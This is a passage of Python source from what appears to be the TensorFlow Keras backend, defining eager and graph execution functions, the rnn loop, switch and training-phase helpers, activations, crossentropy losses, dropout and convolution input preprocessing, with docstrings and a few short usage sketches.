return nest.pack_sequence_as(self._outputs_structure,
fetched[:len(self.outputs)])
class EagerExecutionFunction(object):
"""Helper class for constructing a TF graph function from the Keras graph.
Arguments:
inputs: Feed placeholders to the computation graph.
outputs: Output tensors to fetch.
updates: Additional update ops to be run at function call.
name: A name to help users identify what this function does.
session_kwargs: Unsupported.
"""
def __init__(self, inputs, outputs, updates=None, name=None):
self.name = name
self._outputs_structure = outputs
inputs = nest.flatten(inputs)
outputs = nest.flatten(outputs)
updates = updates or []
if not isinstance(updates, (list, tuple)):
raise TypeError('`updates` in a Keras backend function '
'should be a list or tuple.')
if updates and not outputs:
# Edge case; never happens in practice
raise ValueError('Cannot create a Keras backend function with updates'
' but no outputs during eager execution.')
graphs = {i.graph for i in nest.flatten([inputs, outputs, updates])
if hasattr(i, 'graph')}
if len(graphs) > 1:
raise ValueError('Cannot create an execution function which is comprised '
'of elements from multiple graphs.')
source_graph = graphs.pop()
global_graph = get_graph()
updates_ops = []
legacy_update_ops = []
for update in updates:
# For legacy reasons it is allowed to pass an update as a tuple
# `(variable, new_value)` (this maps to an assign op). Otherwise it
# is assumed to already be an op -- we cannot control its execution
# order.
if isinstance(update, tuple):
legacy_update_ops.append(update)
else:
if hasattr(update, 'op'):
update = update.op
updates_ops.append(update)
with _scratch_graph() as exec_graph:
global_graph = get_graph()
if source_graph not in (exec_graph, global_graph):
raise ValueError('Unknown graph. Aborting.')
if source_graph is global_graph and exec_graph is not global_graph:
init_tensors = (
outputs + updates_ops + [p for [p, _] in legacy_update_ops] +
[p_new for [_, p_new] in legacy_update_ops
if isinstance(p_new, ops.Tensor)])
lifted_map = lift_to_graph.lift_to_graph(
init_tensors=init_tensors, graph=exec_graph, sources=inputs,
add_sources=True, handle_captures=True, base_graph=source_graph)
inputs = [lifted_map[i] for i in inputs]
outputs = [lifted_map[i] for i in outputs]
updates_ops = [lifted_map[i] for i in updates_ops]
legacy_update_ops = [(lifted_map[p], lifted_map.get(p_new, p_new))
for p, p_new in legacy_update_ops]
# Consolidate updates
with exec_graph.as_default():
outputs = cast_variables_to_tensor(outputs)
with ops.control_dependencies(outputs):
for p, p_new in legacy_update_ops:
updates_ops.append(state_ops.assign(p, p_new))
self.inputs, self.outputs = inputs, outputs
with ops.control_dependencies(updates_ops):
self.outputs[0] = array_ops.identity(self.outputs[0])
exec_graph.inputs = self.inputs + list(exec_graph.captures.values())
exec_graph.outputs = self.outputs
graph_fn = eager_function.ConcreteFunction(exec_graph)
graph_fn._num_positional_args = len(self.inputs)
graph_fn._arg_keywords = []
self._graph_fn = graph_fn
# Handle placeholders with default
# (treated as required placeholder by graph functions)
self._placeholder_default_values = {}
with exec_graph.as_default():
for x in self.inputs:
if x.op.type == 'PlaceholderWithDefault':
self._placeholder_default_values[x] = tensor_util.constant_value(
x.op.inputs[0])
def __call__(self, inputs):
inputs = nest.flatten(inputs)
converted_inputs = []
for tensor, value in zip(self.inputs, inputs):
if value is None:
# Assume `value` is a placeholder with default
value = self._placeholder_default_values.get(tensor, None)
if value is None:
raise ValueError(
'You must feed a value for placeholder %s' % (tensor,))
if not isinstance(value, ops.Tensor):
value = ops.convert_to_tensor(value, dtype=tensor.dtype)
if value.dtype != tensor.dtype:
# Temporary workaround due to `convert_to_tensor` not casting floats.
# See b/119637405
value = math_ops.cast(value, tensor.dtype)
converted_inputs.append(value)
outputs = self._graph_fn(*converted_inputs)
return nest.pack_sequence_as(self._outputs_structure,
[x.numpy() for x in outputs])
@keras_export('keras.backend.function')
def function(inputs, outputs, updates=None, name=None, **kwargs):
"""Instantiates a Keras function.
Arguments:
inputs: List of placeholder tensors.
outputs: List of output tensors.
updates: List of update ops.
name: String, name of function.
**kwargs: Passed to `tf.Session.run`.
Returns:
      A callable that, given input values, returns the corresponding
      output values as Numpy arrays.
Raises:
ValueError: if invalid kwargs are passed in or if in eager execution.
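  Example:
  A minimal sketch, assuming the default `float32` floatx and NumPy
  imported as `np` (placeholder-based usage as in the other examples;
  exact output formatting may vary):
  ```python
      >>> x = K.placeholder(shape=(None,))
      >>> double = K.function([x], [x * 2.])
      >>> double([np.array([1., 2.], dtype='float32')])
      [array([ 2.,  4.], dtype=float32)]
  ```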
"""
if ops.executing_eagerly_outside_functions():
if kwargs:
      raise ValueError('Session keyword arguments are not supported during '
'eager execution. You passed: %s' % (kwargs,))
return EagerExecutionFunction(inputs, outputs, updates=updates, name=name)
if kwargs:
for key in kwargs:
if (key not in tf_inspect.getfullargspec(session_module.Session.run)[0]
and key not in ['inputs', 'outputs', 'updates', 'name']):
msg = ('Invalid argument "%s" passed to K.function with TensorFlow '
'backend') % key
raise ValueError(msg)
return GraphExecutionFunction(inputs, outputs, updates=updates, **kwargs)
@keras_export('keras.backend.gradients')
def gradients(loss, variables):
"""Returns the gradients of `loss` w.r.t. `variables`.
Arguments:
loss: Scalar tensor to minimize.
variables: List of variables.
Returns:
A gradients tensor.
"""
return gradients_module.gradients(
loss, variables, colocate_gradients_with_ops=True)
@keras_export('keras.backend.stop_gradient')
def stop_gradient(variables):
"""Returns `variables` but with zero gradient w.r.t. every other variable.
Arguments:
variables: Tensor or list of tensors to consider constant with respect
to any other variable.
Returns:
A single tensor or a list of tensors (depending on the passed argument)
that has no gradient with respect to any other variable.
"""
if isinstance(variables, (list, tuple)):
return [array_ops.stop_gradient(v) for v in variables]
return array_ops.stop_gradient(variables)
# CONTROL FLOW
@keras_export('keras.backend.rnn')
def rnn(step_function,
inputs,
initial_states,
go_backwards=False,
mask=None,
constants=None,
unroll=False,
input_length=None,
time_major=False,
zero_output_for_mask=False):
"""Iterates over the time dimension of a tensor.
Arguments:
step_function: RNN step function.
Args:
    input: Tensor with shape `(samples, ...)` (no time dimension),
        representing input for the batch of samples at a certain
        time step.
    states: List of tensors.
Returns:
    output: Tensor with shape `(samples, output_dim)`
        (no time dimension).
    new_states: List of tensors, same length and shapes
        as `states`. The first state in the list must be the
        output tensor at the previous timestep.
inputs: Tensor of temporal data of shape `(samples, time, ...)`
(at least 3D), or nested tensors, and each of which has shape
`(samples, time, ...)`.
initial_states: Tensor with shape `(samples, state_size)`
(no time dimension), containing the initial values for the states used
in the step function. In the case that state_size is in a nested
shape, the shape of initial_states will also follow the nested
structure.
go_backwards: Boolean. If True, do the iteration over the time
dimension in reverse order and return the reversed sequence.
mask: Binary tensor with shape `(samples, time, 1)`,
with a zero for every element that is masked.
constants: List of constant values passed at each step.
unroll: Whether to unroll the RNN or to use a symbolic `while_loop`.
input_length: If specified, assume time dimension is of this length.
time_major: Boolean. If true, the inputs and outputs will be in shape
`(timesteps, batch, ...)`, whereas in the False case, it will be
`(batch, timesteps, ...)`. Using `time_major = True` is a bit more
efficient because it avoids transposes at the beginning and end of the
RNN calculation. However, most TensorFlow data is batch-major, so by
default this function accepts input and emits output in batch-major
form.
zero_output_for_mask: Boolean. If True, the output for masked timestep
will be zeros, whereas in the False case, output from previous
timestep is returned.
Returns:
A tuple, `(last_output, outputs, new_states)`.
last_output: the latest output of the rnn, of shape `(samples, ...)`
outputs: tensor with shape `(samples, time, ...)` where each
entry `outputs[s, t]` is the output of the step function
at time `t` for sample `s`.
new_states: list of tensors, latest states returned by
the step function, of shape `(samples, ...)`.
Raises:
ValueError: if input dimension is less than 3.
ValueError: if `unroll` is `True` but input timestep is not a fixed
number.
ValueError: if `mask` is provided (not `None`) but states is not provided
(`len(states)` == 0).
"""
def swap_batch_timestep(input_t):
# Swap the batch and timestep dim for the incoming tensor.
axes = list(range(len(input_t.shape)))
axes[0], axes[1] = 1, 0
return array_ops.transpose(input_t, axes)
if not time_major:
inputs = nest.map_structure(swap_batch_timestep, inputs)
flatted_inputs = nest.flatten(inputs)
time_steps = flatted_inputs[0].shape[0]
batch = flatted_inputs[0].shape[1]
time_steps_t = array_ops.shape(flatted_inputs[0])[0]
for input_ in flatted_inputs:
input_.shape.with_rank_at_least(3)
if mask is not None:
if mask.dtype != dtypes_module.bool:
mask = math_ops.cast(mask, dtypes_module.bool)
if len(mask.shape) == 2:
mask = expand_dims(mask)
if not time_major:
mask = swap_batch_timestep(mask)
if constants is None:
constants = []
# tf.where needs its condition tensor to be the same shape as its two
# result tensors, but in our case the condition (mask) tensor is
# (nsamples, 1), and inputs are (nsamples, ndimensions) or even more.
# So we need to broadcast the mask to match the shape of inputs.
# That's what the tile call does; it just repeats the mask along its
# second dimension n times.
def _expand_mask(mask_t, input_t, fixed_dim=1):
assert not nest.is_sequence(mask_t)
assert not nest.is_sequence(input_t)
rank_diff = len(input_t.shape) - len(mask_t.shape)
for _ in range(rank_diff):
mask_t = array_ops.expand_dims(mask_t, -1)
multiples = [1] * fixed_dim + input_t.shape.as_list()[fixed_dim:]
return array_ops.tile(mask_t, multiples)
if unroll:
if not time_steps:
raise ValueError('Unrolling requires a fixed number of timesteps.')
states = tuple(initial_states)
successive_states = []
successive_outputs = []
# Process the input tensors. Each input tensor needs to be split on the
# time_step dim and reversed if go_backwards is True. In the case of nested
# input, the input is flattened and then transformed individually.
# The result is a tuple of lists; each item in the tuple is a list of
# tensors with shape (batch, feature).
def _process_single_input_t(input_t):
input_t = array_ops.unstack(input_t) # unstack for time_step dim
if go_backwards:
input_t.reverse()
return input_t
if nest.is_sequence(inputs):
processed_input = nest.map_structure(_process_single_input_t, inputs)
else:
processed_input = (_process_single_input_t(inputs),)
def _get_input_tensor(time):
inp = [t_[time] for t_ in processed_input]
return nest.pack_sequence_as(inputs, inp)
if mask is not None:
mask_list = array_ops.unstack(mask)
if go_backwards:
mask_list.reverse()
for i in range(time_steps):
inp = _get_input_tensor(i)
mask_t = mask_list[i]
output, new_states = step_function(inp,
tuple(states) + tuple(constants))
tiled_mask_t = _expand_mask(mask_t, output)
if not successive_outputs:
prev_output = zeros_like(output)
else:
prev_output = successive_outputs[-1]
output = array_ops.where(tiled_mask_t, output, prev_output)
return_states = []
for state, new_state in zip(states, new_states):
# (see earlier comment for tile explanation)
tiled_mask_t = _expand_mask(mask_t, new_state)
return_states.append(array_ops.where(tiled_mask_t, new_state, state))
states = return_states
successive_outputs.append(output)
successive_states.append(states)
last_output = successive_outputs[-1]
new_states = successive_states[-1]
outputs = array_ops.stack(successive_outputs)
if zero_output_for_mask:
last_output = array_ops.where(
_expand_mask(mask_list[-1], last_output),
last_output,
zeros_like(last_output))
outputs = array_ops.where(
_expand_mask(mask, outputs, fixed_dim=2),
outputs,
zeros_like(outputs))
else:
for i in range(time_steps):
inp = _get_input_tensor(i)
output, states = step_function(inp, tuple(states) + tuple(constants))
successive_outputs.append(output)
successive_states.append(states)
last_output = successive_outputs[-1]
new_states = successive_states[-1]
outputs = array_ops.stack(successive_outputs)
else:
states = tuple(initial_states)
# Create the input TensorArrays. If the input is a nested structure of
# tensors, it is flattened first and one TensorArray is created per
# flattened tensor.
input_ta = tuple(
tensor_array_ops.TensorArray(
dtype=inp.dtype,
size=time_steps_t,
tensor_array_name='input_ta_%s' % i)
for i, inp in enumerate(flatted_inputs))
input_ta = tuple(
ta.unstack(input_) if not go_backwards else ta
.unstack(reverse(input_, 0))
for ta, input_ in zip(input_ta, flatted_inputs))
# Get the time(0) input and compute the output for it; that output is used
# to determine the dtype of the output TensorArrays. Don't read from
# input_ta because TensorArray's clear_after_read defaults to True.
input_time_zero = nest.pack_sequence_as(inputs,
[inp[0] for inp in flatted_inputs])
# output_time_zero is used to determine the cell output shape and its dtype.
# The value itself is discarded.
output_time_zero, _ = step_function(input_time_zero,
initial_states + constants)
output_ta = tuple(
tensor_array_ops.TensorArray(
dtype=out.dtype,
size=time_steps_t,
tensor_array_name='output_ta_%s' % i)
for i, out in enumerate(nest.flatten(output_time_zero)))
time = constant_op.constant(0, dtype='int32', name='time')
while_loop_kwargs = {
'cond': lambda time, *_: time < time_steps_t,
'maximum_iterations': input_length,
'parallel_iterations': 32,
'swap_memory': True,
}
if mask is not None:
if not states:
raise ValueError('No initial states provided! '
'When using masking in an RNN, you should '
'provide initial states '
'(and your step function should return '
'as its first state at time `t` '
'the output at time `t-1`).')
if go_backwards:
mask = reverse(mask, 0)
mask_ta = tensor_array_ops.TensorArray(
dtype=dtypes_module.bool,
size=time_steps_t,
tensor_array_name='mask_ta')
mask_ta = mask_ta.unstack(mask)
# The mask for the output at step T is based on the output at step T - 1.
# For T = 0, a zero-filled tensor is used.
flat_zero_output = tuple(array_ops.zeros_like(o)
for o in nest.flatten(output_time_zero))
def _step(time, output_ta_t, prev_output, *states):
"""RNN step function.
Arguments:
time: Current timestep value.
output_ta_t: TensorArray.
prev_output: tuple of outputs from time - 1.
*states: List of states.
Returns:
Tuple: `(time + 1, output_ta_t, output) + tuple(new_states)`
"""
current_input = tuple(ta.read(time) for ta in input_ta)
# maybe set shape.
current_input = nest.pack_sequence_as(inputs, current_input)
mask_t = mask_ta.read(time)
output, new_states = step_function(current_input,
tuple(states) + tuple(constants))
# mask output
flat_output = nest.flatten(output)
flat_mask_output = (flat_zero_output if zero_output_for_mask
else nest.flatten(prev_output))
tiled_mask_t = tuple(_expand_mask(mask_t, o) for o in flat_output)
flat_new_output = tuple(
array_ops.where(m, o, zo) for m, o, zo in zip(
tiled_mask_t, flat_output, flat_mask_output))
# mask states
flat_state = nest.flatten(states)
flat_new_state = nest.flatten(new_states)
for state, new_state in zip(flat_state, flat_new_state):
if hasattr(new_state, 'set_shape'):
new_state.set_shape(state.shape)
tiled_mask_t = tuple(_expand_mask(mask_t, s) for s in flat_state)
flat_final_state = tuple(
array_ops.where(m, s, ps)
for m, s, ps in zip(tiled_mask_t, flat_new_state, flat_state))
new_states = nest.pack_sequence_as(new_states, flat_final_state)
output_ta_t = tuple(
ta.write(time, out)
for ta, out in zip(output_ta_t, flat_new_output))
return (time + 1, output_ta_t,
tuple(flat_new_output)) + tuple(new_states)
final_outputs = control_flow_ops.while_loop(
body=_step,
loop_vars=(time, output_ta, flat_zero_output) + states,
**while_loop_kwargs)
# Skip final_outputs[2] which is the output for final timestep.
new_states = final_outputs[3:]
else:
def _step(time, output_ta_t, *states):
"""RNN step function.
Arguments:
time: Current timestep value.
output_ta_t: TensorArray.
*states: List of states.
Returns:
Tuple: `(time + 1, output_ta_t) + tuple(new_states)`
"""
current_input = tuple(ta.read(time) for ta in input_ta)
current_input = nest.pack_sequence_as(inputs, current_input)
output, new_states = step_function(current_input,
tuple(states) + tuple(constants))
flat_state = nest.flatten(states)
flat_new_state = nest.flatten(new_states)
for state, new_state in zip(flat_state, flat_new_state):
if hasattr(new_state, 'set_shape'):
new_state.set_shape(state.shape)
flat_output = nest.flatten(output)
output_ta_t = tuple(
ta.write(time, out) for ta, out in zip(output_ta_t, flat_output))
new_states = nest.pack_sequence_as(initial_states, flat_new_state)
return (time + 1, output_ta_t) + tuple(new_states)
final_outputs = control_flow_ops.while_loop(
body=_step,
loop_vars=(time, output_ta) + states,
**while_loop_kwargs)
new_states = final_outputs[2:]
output_ta = final_outputs[1]
outputs = tuple(o.stack() for o in output_ta)
last_output = tuple(o[-1] for o in outputs)
outputs = nest.pack_sequence_as(output_time_zero, outputs)
last_output = nest.pack_sequence_as(output_time_zero, last_output)
# static shape inference
def set_shape(output_):
if hasattr(output_, 'set_shape'):
shape = output_.shape.as_list()
shape[0] = time_steps
shape[1] = batch
output_.set_shape(shape)
return output_
outputs = nest.map_structure(set_shape, outputs)
if not time_major:
outputs = nest.map_structure(swap_batch_timestep, outputs)
return last_output, outputs, new_states
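# Minimal sketch (hypothetical helper, shapes and values are illustrative
# only) of driving `rnn` with a hand-written step function that accumulates
# its inputs over time.
def _example_rnn_usage():
  def _step(inputs_t, states):
    new_sum = states[0] + inputs_t   # (samples, dim)
    return new_sum, [new_sum]        # output doubles as the single state
  inputs = constant_op.constant(np.ones((4, 5, 3), dtype=np.float32))
  initial_states = [constant_op.constant(np.zeros((4, 3), dtype=np.float32))]
  return rnn(_step, inputs, initial_states)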
@keras_export('keras.backend.switch')
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value.
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
Arguments:
condition: tensor (`int` or `bool`).
then_expression: either a tensor, or a callable that returns a tensor.
else_expression: either a tensor, or a callable that returns a tensor.
Returns:
The selected tensor.
Raises:
ValueError: If rank of `condition` is greater than rank of expressions.
"""
if condition.dtype != dtypes_module.bool:
condition = math_ops.cast(condition, 'bool')
cond_ndim = ndim(condition)
if not cond_ndim:
if not callable(then_expression):
def then_expression_fn():
return then_expression
else:
then_expression_fn = then_expression
if not callable(else_expression):
def else_expression_fn():
return else_expression
else:
else_expression_fn = else_expression
x = control_flow_ops.cond(condition, then_expression_fn, else_expression_fn)
else:
# tf.where needs its condition tensor
# to be the same shape as its two
# result tensors
if callable(then_expression):
then_expression = then_expression()
if callable(else_expression):
else_expression = else_expression()
expr_ndim = ndim(then_expression)
if cond_ndim > expr_ndim:
raise ValueError('Rank of `condition` should be less than or'
' equal to rank of `then_expression` and '
'`else_expression`. ndim(condition)=' + str(cond_ndim) +
', ndim(then_expression)'
'=' + str(expr_ndim))
if cond_ndim > 1:
ndim_diff = expr_ndim - cond_ndim
cond_shape = array_ops.concat(
[array_ops.shape(condition), [1] * ndim_diff], axis=0)
condition = array_ops.reshape(condition, cond_shape)
expr_shape = array_ops.shape(then_expression)
shape_diff = expr_shape - cond_shape
tile_shape = array_ops.where(shape_diff > 0, expr_shape,
array_ops.ones_like(expr_shape))
condition = array_ops.tile(condition, tile_shape)
x = array_ops.where(condition, then_expression, else_expression)
return x
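# Illustrative sketch (hypothetical helper): `switch` broadcasts a lower-rank
# boolean condition against the two result tensors, selecting whole rows per
# sample in this example.
def _example_switch_usage():
  condition = constant_op.constant([True, False])            # shape (2,)
  then_branch = constant_op.constant([[1., 1.], [1., 1.]])   # shape (2, 2)
  else_branch = constant_op.constant([[0., 0.], [0., 0.]])
  return switch(condition, then_branch, else_branch)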
@keras_export('keras.backend.in_train_phase')
def in_train_phase(x, alt, training=None):
"""Selects `x` in train phase, and `alt` otherwise.
Note that `alt` should have the *same shape* as `x`.
Arguments:
x: What to return in train phase
(tensor or callable that returns a tensor).
alt: What to return otherwise
(tensor or callable that returns a tensor).
training: Optional scalar tensor
(or Python boolean, or Python integer)
specifying the learning phase.
Returns:
Either `x` or `alt` based on the `training` flag.
The `training` flag defaults to `K.learning_phase()`.
"""
if training is None:
training = learning_phase()
if training == 1 or training is True:
if callable(x):
return x()
else:
return x
elif training == 0 or training is False:
if callable(alt):
return alt()
else:
return alt
# else: assume learning phase is a placeholder tensor.
x = switch(training, x, alt)
return x
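# Sketch of the intended pattern (hypothetical helper): wrap both branches in
# callables so only the selected branch builds ops; `dropout` is the backend
# helper defined further below in this module.
def _example_in_train_phase_usage(x):
  return in_train_phase(lambda: dropout(x, 0.5), lambda: x)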
@keras_export('keras.backend.in_test_phase')
def in_test_phase(x, alt, training=None):
"""Selects `x` in test phase, and `alt` otherwise.
Note that `alt` should have the *same shape* as `x`.
Arguments:
x: What to return in test phase
(tensor or callable that returns a tensor).
alt: What to return otherwise
(tensor or callable that returns a tensor).
training: Optional scalar tensor
(or Python boolean, or Python integer)
specifying the learning phase.
Returns:
Either `x` or `alt` based on `K.learning_phase`.
"""
return in_train_phase(alt, x, training=training)
# NN OPERATIONS
@keras_export('keras.backend.relu')
def relu(x, alpha=0., max_value=None, threshold=0):
"""Rectified linear unit.
With default values, it returns element-wise `max(x, 0)`.
Otherwise, it follows:
`f(x) = max_value` for `x >= max_value`,
`f(x) = x` for `threshold <= x < max_value`,
`f(x) = alpha * (x - threshold)` otherwise.
Arguments:
x: A tensor or variable.
alpha: A scalar, slope of negative section (default=`0.`).
max_value: float. Saturation threshold.
threshold: float. Threshold value for thresholded activation.
Returns:
A tensor.
"""
if alpha != 0.:
if max_value is None and threshold == 0:
return nn.leaky_relu(x, alpha=alpha)
if threshold != 0:
negative_part = nn.relu(-x + threshold)
else:
negative_part = nn.relu(-x)
clip_max = max_value is not None
if threshold != 0:
# computes x for x > threshold else 0
x = x * math_ops.cast(math_ops.greater(x, threshold), floatx())
elif max_value == 6:
# if no threshold, then can use nn.relu6 native TF op for performance
x = nn.relu6(x)
clip_max = False
else:
x = nn.relu(x)
if clip_max:
max_value = _constant_to_tensor(max_value, x.dtype.base_dtype)
zero = _constant_to_tensor(0., x.dtype.base_dtype)
x = clip_ops.clip_by_value(x, zero, max_value)
if alpha != 0.:
alpha = _to_tensor(alpha, x.dtype.base_dtype)
x -= alpha * negative_part
return x
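# Illustrative sketch (hypothetical helper) of the piecewise definition
# documented above: a leaky, thresholded and saturated ReLU evaluated on a
# small constant tensor.
def _example_relu_usage():
  x = constant_op.constant([-3.0, -1.0, 0.5, 2.0, 10.0])
  return relu(x, alpha=0.1, max_value=6.0, threshold=1.0)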
@keras_export('keras.backend.elu')
def elu(x, alpha=1.):
"""Exponential linear unit.
Arguments:
x: A tensor or variable to compute the activation function for.
alpha: A scalar, slope of negative section.
Returns:
A tensor.
"""
res = nn.elu(x)
if alpha == 1:
return res
else:
return array_ops.where(x > 0, res, alpha * res)
@keras_export('keras.backend.softmax')
def softmax(x, axis=-1):
"""Softmax of a tensor.
Arguments:
x: A tensor or variable.
axis: The dimension softmax would be performed on.
The default is -1 which indicates the last dimension.
Returns:
A tensor.
"""
return nn.softmax(x, axis=axis)
@keras_export('keras.backend.softplus')
def softplus(x):
"""Softplus of a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.softplus(x)
@keras_export('keras.backend.softsign')
def softsign(x):
"""Softsign of a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.softsign(x)
@keras_export('keras.backend.categorical_crossentropy')
def categorical_crossentropy(target, output, from_logits=False, axis=-1):
"""Categorical crossentropy between an output tensor and a target tensor.
Arguments:
target: A tensor of the same shape as `output`.
output: A tensor resulting from a softmax
(unless `from_logits` is True, in which
case `output` is expected to be the logits).
from_logits: Boolean, whether `output` is the
result of a softmax, or is a tensor of logits.
axis: Int specifying the channels axis. `axis=-1` corresponds to data
format `channels_last`, and `axis=1` corresponds to data format
`channels_first`.
Returns:
Output tensor.
Raises:
ValueError: if `axis` is neither -1 nor one of the axes of `output`.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Softmax'):
axis = axis % len(output.shape)
# scale preds so that the class probas of each sample sum to 1
output = output / math_ops.reduce_sum(output, axis, True)
# Compute cross entropy from probabilities.
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1. - epsilon_)
return -math_ops.reduce_sum(target * math_ops.log(output), axis)
else:
# When the softmax activation function is used for the output operation, we
# use the logits from the softmax op directly to compute the loss, in order
# to avoid numerical issues from probabilities collapsing to zero in training.
# See b/117284466
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
return nn.softmax_cross_entropy_with_logits_v2(labels=target, logits=output)
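# Sketch (hypothetical helper) comparing the probability and logit paths of
# `categorical_crossentropy`; the one-hot targets and logits are made up.
def _example_categorical_crossentropy_usage():
  target = constant_op.constant([[0., 1., 0.], [0., 0., 1.]])
  logits = constant_op.constant([[1.0, 2.0, 0.5], [0.3, 0.2, 2.5]])
  loss_from_probs = categorical_crossentropy(target, nn.softmax(logits))
  loss_from_logits = categorical_crossentropy(target, logits, from_logits=True)
  return loss_from_probs, loss_from_logits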
@keras_export('keras.backend.sparse_categorical_crossentropy')
def sparse_categorical_crossentropy(target, output, from_logits=False, axis=-1):
"""Categorical crossentropy with integer targets.
Arguments:
target: An integer tensor.
output: A tensor resulting from a softmax
(unless `from_logits` is True, in which
case `output` is expected to be the logits).
from_logits: Boolean, whether `output` is the
result of a softmax, or is a tensor of logits.
axis: Int specifying the channels axis. `axis=-1` corresponds to data
format `channels_last`, and `axis=1` corresponds to data format
`channels_first`.
Returns:
Output tensor.
Raises:
ValueError: if `axis` is neither -1 nor one of the axes of `output`.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Softmax'):
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1 - epsilon_)
output = math_ops.log(output)
else:
# When the softmax activation function is used for the output operation, we
# use the logits from the softmax op directly to compute the loss, in order
# to avoid numerical issues from probabilities collapsing to zero in training.
# See b/117284466
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
rank = len(output.shape)
axis = axis % rank
if axis != rank - 1:
permutation = list(range(axis)) + list(range(axis + 1, rank)) + [axis]
output = array_ops.transpose(output, perm=permutation)
output_shape = output.shape
targets = cast(flatten(target), 'int64')
logits = array_ops.reshape(output, [-1, int(output_shape[-1])])
res = nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
if len(output_shape) >= 3:
# If our output includes timesteps or spatial dimensions we need to reshape
return array_ops.reshape(res, array_ops.shape(output)[:-1])
else:
return res
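# Sketch (hypothetical helper): integer class indices as targets with raw
# logits (arbitrary values), exercising the `from_logits=True` path of
# `sparse_categorical_crossentropy`.
def _example_sparse_categorical_crossentropy_usage():
  target = constant_op.constant([1, 2])
  logits = constant_op.constant([[1.0, 2.0, 0.5], [0.3, 0.2, 2.5]])
  return sparse_categorical_crossentropy(target, logits, from_logits=True)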
@keras_export('keras.backend.binary_crossentropy')
def binary_crossentropy(target, output, from_logits=False):
"""Binary crossentropy between an output tensor and a target tensor.
Arguments:
target: A tensor with the same shape as `output`.
output: A tensor.
from_logits: Whether `output` is expected to be a logits tensor.
By default, we consider that `output`
encodes a probability distribution.
Returns:
A tensor.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Sigmoid'):
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1. - epsilon_)
# Compute cross entropy from probabilities.
bce = target * math_ops.log(output + epsilon())
bce += (1 - target) * math_ops.log(1 - output + epsilon())
return -bce
else:
# When the sigmoid activation function is used for the output operation, we
# use the logits from the sigmoid op directly to compute the loss, in order
# to avoid numerical issues from probabilities collapsing to zero in training.
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
return nn.sigmoid_cross_entropy_with_logits(labels=target, logits=output)
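# Sketch (hypothetical helper): element-wise binary crossentropy from
# probabilities and from logits; targets and predictions are arbitrary.
def _example_binary_crossentropy_usage():
  target = constant_op.constant([[1.0], [0.0]])
  logits = constant_op.constant([[2.0], [-1.0]])
  loss_from_probs = binary_crossentropy(target, nn.sigmoid(logits))
  loss_from_logits = binary_crossentropy(target, logits, from_logits=True)
  return loss_from_probs, loss_from_logits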
@keras_export('keras.backend.sigmoid')
def sigmoid(x):
"""Element-wise sigmoid.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.sigmoid(x)
@keras_export('keras.backend.hard_sigmoid')
def hard_sigmoid(x):
"""Segment-wise linear approximation of sigmoid.
Faster than sigmoid.
Returns `0.` if `x < -2.5`, `1.` if `x > 2.5`.
In `-2.5 <= x <= 2.5`, returns `0.2 * x + 0.5`.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
point_two = _constant_to_tensor(0.2, x.dtype.base_dtype)
point_five = _constant_to_tensor(0.5, x.dtype.base_dtype)
x = math_ops.mul(x, point_two)
x = math_ops.add(x, point_five)
x = clip_ops.clip_by_value(x, 0., 1.)
return x
@keras_export('keras.backend.tanh')
def tanh(x):
"""Element-wise tanh.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.tanh(x)
@keras_export('keras.backend.dropout')
def dropout(x, level, noise_shape=None, seed=None):
"""Sets entries in `x` to zero at random, while scaling the entire tensor.
Arguments:
x: tensor
level: fraction of the entries in the tensor
that will be set to 0.
noise_shape: shape for randomly generated keep/drop flags,
must be broadcastable to the shape of `x`
seed: random seed to ensure determinism.
Returns:
A tensor.
"""
if seed is None:
seed = np.random.randint(10e6)
return nn.dropout_v2(x, rate=level, noise_shape=noise_shape, seed=seed)
@keras_export('keras.backend.l2_normalize')
def l2_normalize(x, axis=None):
"""Normalizes a tensor wrt the L2 norm alongside the specified axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform normalization.
Returns:
A tensor.
"""
return nn.l2_normalize(x, axis=axis)
@keras_export('keras.backend.in_top_k')
def in_top_k(predictions, targets, k):
"""Returns whether the `targets` are in the top `k` `predictions`.
Arguments:
predictions: A tensor of shape `(batch_size, classes)` and type `float32`.
targets: A 1D tensor of length `batch_size` and type `int32` or `int64`.
k: An `int`, number of top elements to consider.
Returns:
A 1D tensor of length `batch_size` and type `bool`.
`output[i]` is `True` if `predictions[i, targets[i]]` is within top-`k`
values of `predictions[i]`.
"""
return nn.in_top_k(predictions, targets, k)
# CONVOLUTIONS
def _preprocess_conv1d_input(x, data_format):
"""Transpose and cast the input before the conv1d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
A tensor.
"""
tf_data_format = 'NWC' # to pass TF Conv2dNative operations
if data_format == 'channels_first':
if not _has_nchw_support():
x = array_ops.transpose(x, (0, 2, 1)) # NCW -> NWC
else:
tf_data_format = 'NCW'
return x, tf_data_format
def _preprocess_conv2d_input(x, data_format, force_transpose=False):
"""Transpose and cast the input before the conv2d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
force_transpose: Boolean. If True, the input will always be transposed
from NCHW to NHWC if `data_format` is `"channels_first"`.
If False, the transposition only occurs on CPU (GPU ops are
assumed to support NCHW).
Returns:
A tensor.
"""
tf_data_format = 'NHWC'
if data_format == 'channels_first':
if not _has_nchw_support() or force_transpose:
x = array_ops.transpose(x, (0, 2, 3, 1)) # NCHW -> NHWC
